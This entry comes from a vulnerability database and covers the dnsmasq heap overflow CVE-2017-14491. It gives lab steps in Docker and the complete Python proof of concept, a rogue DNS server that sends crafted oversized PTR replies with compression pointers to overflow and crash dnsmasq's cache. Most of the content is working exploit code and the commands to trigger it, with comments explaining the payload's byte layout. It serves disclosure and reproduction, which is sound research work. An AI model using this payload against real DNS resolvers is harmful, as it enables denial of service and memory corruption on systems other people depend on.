seebugRootSSV:96618
HistoryOct 09, 2017 - 12:00 a.m.

Dnsmasq Heap based overflow(CVE-2017-14491)


EPSS: 0.357 (Low), percentile 96.7%

1) Build the Docker image and open three terminals

docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
docker exec -it <container_id> bash

2) On one terminal let's launch the attacker-controlled DNS server:

# python poc.py  127.0.0.2 53
Listening at 127.0.0.2:53
3) On another terminal let's launch dnsmasq, forwarding queries to the attacker-controlled DNS server:
# /testing/dnsmasq/src/dnsmasq -p 53535 --no-daemon --log-queries -S 127.0.0.2 --no-hosts --no-resolv
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq: using nameserver 127.0.0.2#53
dnsmasq: cleared cache

4) Let's fake a client making a request twice (or more) so we hit the dnsmasq cache:

# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null

5) The crash might not be triggered on the first try due to the non-deterministic order of the dnsmasq cache. Restarting dnsmasq and retrying should be sufficient to trigger a crash.


                                                #!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
#  Fermin J. Serna <[email protected]>
#  Felix Wilhelm <[email protected]>
#  Gabriel Campana <[email protected]>
#  Kevin Hamacher <[email protected]>
#  Gynvael Coldwind <[email protected]>
#  Ron Bowes - Xoogler :/

import socket
import struct
import sys

def dw(x):
  """Encode *x* as one 16-bit unsigned big-endian field, as DNS headers use."""
  # '>H' = big-endian unsigned short; values outside 0..65535 raise struct.error.
  word = struct.Struct('>H')
  return word.pack(x)

def udp_handler(sock_udp):
  """Answer one UDP DNS query with a fixed, hand-built PTR response.

  Reads a single datagram from *sock_udp*, copies its 16-bit transaction ID
  into the reply header and sends the reply back to the sender. Everything
  after the ID is hardcoded: the question is always the PTR lookup for
  125.8.8.8.in-addr.arpa and the answer section is always the same 0x52
  records, whatever the client actually asked.

  For anyone inspecting upstream DNS replies: the first answer carries a
  name whose encoded form is 1024 bytes, well past the 255-octet name limit
  of RFC 1035, and the header advertises 82 PTR answers for one question.

  Returns nothing; the only effects are the print and the sendto() call.
  """

  # One datagram per call, truncated to 1024 bytes by the recv buffer size.
  data, addr = sock_udp.recvfrom(1024)
  print '[UDP] Total Data len recv ' + str(len(data))
  # Transaction ID = first two bytes of the query; echoed in the reply below.
  # No length check: a datagram shorter than 2 bytes makes unpack() raise.
  id = struct.unpack('>H', data[0:2])[0]
  # NOTE(review): 'query' is never read again; the question section is
  # re-emitted from a literal further down instead of being copied.
  query = data[12:]

  # 12-byte DNS header. From here on 'data' is the outgoing reply.
  data = dw(id)                        # id
  data += dw(0x85a0)                   # flags: QR, AA, RD, RA, AD set; rcode 0
  data += dw(1)                        # questions
  data += dw(0x52)                     # answers (0x52 = 82, matches 1+1+79+1 below)
  data += dw(0)                        # authority records
  data += dw(0)                        # additional

  # Add the question back - we're just hardcoding it
  # (28 bytes, so the answer section starts at offset 40 of the message).
  data += ('\x03125\x018\x018\x018\x07in-addr\x04arpa\x00' +
           '\x00\x0c' + # type = 'PTR'
           '\x00\x01')   # cls = 'IN'

  # Add the first answer.
  # Its rdata is a single name: 16 labels of 62 bytes, one of 14 bytes and
  # the root label, i.e. 16*63 + 15 + 1 = 1024 bytes, which is exactly the
  # declared rdlength of 0x0400.
  data += ('\xc0\x0c' + # ptr to the name
           '\x00\x0c' + # type = 'PTR'
           '\x00\x01' + # cls = 'IN'
           '\x00\x00\x00\x3d' + # ttl
           '\x04\x00' + # size of this resource record
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x0e' + 'Z'*14 +
           '\x00')

  # Add the next answer, which is written out in full
  # (38-byte name, matching rdlength 0x26; its rdata begins at offset 0x440).
  data += ('\xc0\x0c' + # ptr to the name
           '\x00\x0c' + # type = 'PTR'
           '\x00\x01' + # cls = 'IN'
           '\x00\x00\x00\x3d' + # ttl
           '\x00\x26' + # size of this resource record
           '\x08DCBBEEEE\x04DDDD\x08CCCCCCCC\x04AAAA\x04BBBB\x03com\x00')

  # 79 identical answers whose whole rdata is a 2-byte compression pointer
  # back to the name written out in the previous record.
  for _ in range(79):
    data += ('\xc0\x0c' + # ptr to the name
             '\x00\x0c' + # type = 'PTR'
             '\x00\x01' + # cls = 'IN'
             '\x00\x00\x00\x3d' + # ttl
             '\x00\x02' + # size of the compressed resource record
             '\xc4\x40')   # pointer to the second record's name

  # Final answer: two literal labels followed by a pointer to offset 0x449,
  # nine bytes into the second record's name (5 + 10 + 2 = 17 = rdlength 0x11).
  data += ('\xc0\x0c' + # ptr to the name
           '\x00\x0c' + # type = 'PTR'
           '\x00\x01' + # cls = 'IN'
           '\x00\x00\x00\x3d' + # ttl
           '\x00\x11' + # size of this resource record
           '\x04EEEE\x09DAABBEEEE\xc4\x49')

  # Reply to whichever address the query came from.
  sock_udp.sendto(data, addr)

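if __name__ == '__main__':

  # Exactly two arguments are required: the address and UDP port to bind.
  if len(sys.argv) != 3:
    print 'Usage: %s <ip> <port>\n' % sys.argv[0]
    sys.exit(0)

  ip = sys.argv[1]
  port = int(sys.argv[2])  # a non-numeric port raises ValueError here

  # The reproduction steps bind this listener to 127.0.0.2, a loopback
  # address, so it is reachable only from inside the test container.
  sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  try:
    sock_udp.bind((ip, port))
    print 'Listening at %s:%d\n' % (ip, port)

    # Serve until interrupted; each call answers exactly one datagram.
    while True:
      udp_handler(sock_udp)
  finally:
    # The loop never ends normally, so the close() that used to follow it
    # was unreachable; release the socket on any exit path instead.
    sock_udp.close()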